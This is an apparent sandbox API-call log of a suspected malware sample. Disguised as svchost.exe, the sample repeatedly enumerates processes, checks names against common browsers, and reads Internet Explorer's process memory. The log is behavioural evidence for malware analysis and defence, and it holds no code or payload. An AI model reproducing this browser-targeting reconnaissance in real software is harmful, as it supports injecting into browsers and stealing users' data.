	[0198.109] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.109] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.109] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0198.109] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.109] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.110] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0198.110] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x159c
	[0198.110] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.110] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0198.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.111] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.111] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0198.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.111] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.112] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0198.112] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x15a0
	[0198.112] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.113] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0198.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.113] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.114] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.114] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0198.114] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.114] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.115] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0198.115] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x15a4
	[0198.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.115] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0198.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.116] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.116] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0198.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.116] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.116] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0198.117] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x15a8
	[0198.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.117] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0198.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.118] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.118] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0198.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.119] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.119] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0198.120] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x15ac
	[0198.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.120] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0198.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.120] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.172] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.172] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0198.173] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.173] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.173] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0198.174] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x15b0
	[0198.174] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.174] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0198.174] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.174] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.174] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.174] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0198.175] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.175] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.175] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0198.175] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x15b4
	[0198.176] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.176] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0198.176] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.176] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.176] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.176] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0198.176] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.176] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.177] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0198.177] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x15b8
	[0198.177] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.177] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0198.178] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.178] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.178] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.178] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0198.179] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.179] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.179] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0198.180] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x15bc
	[0198.180] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.180] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0198.181] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.181] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.181] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.181] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0198.182] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.182] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.182] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0198.183] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x15c0
	[0198.183] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.183] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0198.183] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.184] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.184] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.184] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0198.184] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.184] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.185] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0198.185] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x15c4
	[0198.186] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.186] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0198.186] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.186] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.187] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0198.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.187] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.188] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0198.189] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x15c8
	[0198.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.189] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0198.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.189] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.190] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0198.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.190] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.191] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0198.191] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x15cc
	[0198.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.191] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0198.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.192] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0198.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.192] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0198.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.192] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.193] NtQueryInformationProcess (in: ProcessHandle=0x15cc, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0198.193] ReadProcessMemory (in: hProcess=0x15cc, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0198.193] ReadProcessMemory (in: hProcess=0x15cc, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0198.193] ReadProcessMemory (in: hProcess=0x15cc, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0198.193] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0198.193] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0198.194] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x15d0
	[0198.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.194] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0198.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.194] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0198.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.194] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0198.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.195] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.195] NtQueryInformationProcess (in: ProcessHandle=0x15d0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0198.195] ReadProcessMemory (in: hProcess=0x15d0, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0198.195] ReadProcessMemory (in: hProcess=0x15d0, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0198.195] ReadProcessMemory (in: hProcess=0x15d0, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0198.195] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0198.195] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0198.196] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x15d4
	[0198.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.196] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0198.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.197] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.197] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0198.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.197] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.197] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0198.198] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x15d8
	[0198.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.198] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0198.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.199] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.199] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0198.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.199] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.200] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.200] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x15dc
	[0198.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.200] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.201] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.201] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.201] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.201] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.202] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0198.203] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb98) returned 0x15e0
	[0198.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.203] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.203] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.204] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.204] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.204] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.205] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x15e4
	[0198.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.205] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.205] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.206] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.206] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.206] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0198.207] CloseHandle (hObject=0x188) returned 1
	[0198.207] Sleep (dwMilliseconds=0x64) 
	[0198.414] GetCurrentProcessId () returned 0x110
	[0198.414] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0198.421] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0198.422] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0198.423] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0198.423] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x15e8
	[0198.423] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.423] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0198.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.424] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.424] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0198.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.424] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.424] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0198.425] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x15ec
	[0198.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.425] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0198.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.426] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.426] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0198.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.426] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
